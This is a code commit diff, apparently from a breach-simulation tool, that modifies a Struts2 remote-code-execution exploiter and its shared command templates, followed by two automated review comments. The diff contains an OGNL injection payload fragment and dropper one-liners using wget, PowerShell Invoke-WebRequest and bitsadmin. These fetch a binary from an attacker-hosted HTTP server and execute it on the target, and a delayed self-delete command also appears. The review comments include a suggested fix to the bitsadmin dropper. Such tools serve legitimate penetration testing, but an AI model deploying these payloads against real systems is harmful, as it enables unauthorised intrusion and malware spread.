Fixed some bugs and more notes

This commit is contained in:
Vakaris 2018-06-25 18:26:34 +03:00
parent 81712ddbf0
commit 671452243d
2 changed files with 10 additions and 10 deletions


@ -12,7 +12,7 @@ import logging
from exploit import HostExploiter from exploit import HostExploiter
from exploit.tools import get_target_monkey, get_monkey_depth from exploit.tools import get_target_monkey, get_monkey_depth
from tools import build_monkey_commandline, HTTPTools from tools import build_monkey_commandline, HTTPTools
from model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, DROPPER_ARG from model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, RDP_CMDLINE_HTTP_BITS_DROPPER
__author__ = "VakarisZ" __author__ = "VakarisZ"
@ -20,9 +20,6 @@ LOG = logging.getLogger(__name__)
DOWNLOAD_TIMEOUT = 300 DOWNLOAD_TIMEOUT = 300
RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (DROPPER_ARG, )
class Struts2Exploiter(HostExploiter): class Struts2Exploiter(HostExploiter):
_TARGET_OS_TYPE = ['linux', 'windows'] _TARGET_OS_TYPE = ['linux', 'windows']
@ -47,7 +44,8 @@ class Struts2Exploiter(HostExploiter):
if port[1]: if port[1]:
current_host = "https://%s:%s" % (self.host.ip_addr, port[0]) current_host = "https://%s:%s" % (self.host.ip_addr, port[0])
else: else:
current_host = "http://%s:%s" % (self.host.ip_addr, port[0]) # TODO remove struts
current_host = "http://%s:%s/struts" % (self.host.ip_addr, port[0])
# Get full URL # Get full URL
url = self.get_redirected(current_host) url = self.get_redirected(current_host)
LOG.info("Trying to exploit with struts2") LOG.info("Trying to exploit with struts2")
@ -87,7 +85,7 @@ class Struts2Exploiter(HostExploiter):
return False return False
LOG.info("Started http server on %s", http_path) LOG.info("Started http server on %s", http_path)
cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1) cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1, dropper_path)
command = WGET_HTTP % {'monkey_path': dropper_path, command = WGET_HTTP % {'monkey_path': dropper_path,
'http_path': http_path, 'parameters': cmdline} 'http_path': http_path, 'parameters': cmdline}
@ -135,12 +133,13 @@ class Struts2Exploiter(HostExploiter):
return False return False
LOG.info("Started http server on %s", http_path) LOG.info("Started http server on %s", http_path)
cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1) # We need to double escape backslashes. Once for payload, twice for command
cmdline = re.sub(r"\\", r"\\\\", build_monkey_commandline(self.host, get_monkey_depth() - 1, dropper_path))
command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path), command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
'http_path': http_path, 'parameters': cmdline} 'http_path': http_path, 'parameters': cmdline}
backup_command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path), backup_command = RDP_CMDLINE_HTTP_BITS_DROPPER % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
'http_path': http_path, 'parameters': cmdline} 'http_path': http_path, 'parameters': cmdline}
resp = self.exploit(url, command) resp = self.exploit(url, command)
@ -196,8 +195,6 @@ class Struts2Exploiter(HostExploiter):
:param cmd: Code to try and execute on host :param cmd: Code to try and execute on host
:return: response :return: response
""" """
page = ""
payload = "%%{(#_='multipart/form-data')." \ payload = "%%{(#_='multipart/form-data')." \
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
"(#_memberAccess?" \ "(#_memberAccess?" \
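Review bot: The plaintext branch of the port loop in the second hunk now hard-codes a `/struts` context path (`current_host = "http://%s:%s/struts" % (self.host.ip_addr, port[0])`) that the `https://` branch two lines above does not have, and the `# TODO remove struts` beside it reads as a leftover from a local test target rather than intended behaviour. Shipped this way, HTTP targets are presumably only probed at `/struts` while HTTPS targets are probed at the root, so a Struts2 application at the root or at any other context on plain HTTP would be missed, and `self.get_redirected(current_host)` starts from the wrong URL. Either restore the symmetric line `current_host = "http://%s:%s" % (self.host.ip_addr, port[0])`, or if probing several context paths is the goal, put them in a module-level constant and iterate it for both schemes. The enclosing method starts before and ends after the hunk.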


@ -19,8 +19,11 @@ DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del
# Commands used for downloading monkeys # Commands used for downloading monkeys
POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, ) POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, )
WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, ) WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, )
RDP_CMDLINE_HTTP_BITS_DROPPER = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (DROPPER_ARG, )
# Commands used to check for architecture and if machine is exploitable # Commands used to check for architecture and if machine is exploitable
CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING
CHECK_LINUX = "echo %s && lscpu" % ID_STRING CHECK_LINUX = "echo %s && lscpu" % ID_STRING
# Commands used to check if monkeys already exists # Commands used to check if monkeys already exists
EXISTS = "ls %s" EXISTS = "ls %s"
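Review bot: The new `RDP_CMDLINE_HTTP_BITS_DROPPER` substitutes `%(monkey_path)s` unquoted both as the bitsadmin destination and as the program given to `start /b`, so if the dropper path ever contains a space (anything under a profile or `Program Files` directory) cmd.exe splits it into separate arguments and the fallback download and launch would presumably fail or act on the wrong file; the neighbouring `POWERSHELL_HTTP` quotes the path for `-OutFile` but has the same gap on its execution step. If quoting is added, `start` needs an empty title first or it treats the quoted path as the window title: `'bitsadmin /transfer Update /download /priority high %%(http_path)s "%%(monkey_path)s"&&start /b "" "%%(monkey_path)s" %s %%(parameters)s' % (DROPPER_ARG, )`. The `RDP_` prefix is also misleading now that the constant lives in the shared model and is used by the Struts2 exploiter; a transport-neutral name such as `CMDLINE_HTTP_BITS_DROPPER` with a one-line comment that it is the cmd.exe fallback when PowerShell is unavailable would read better.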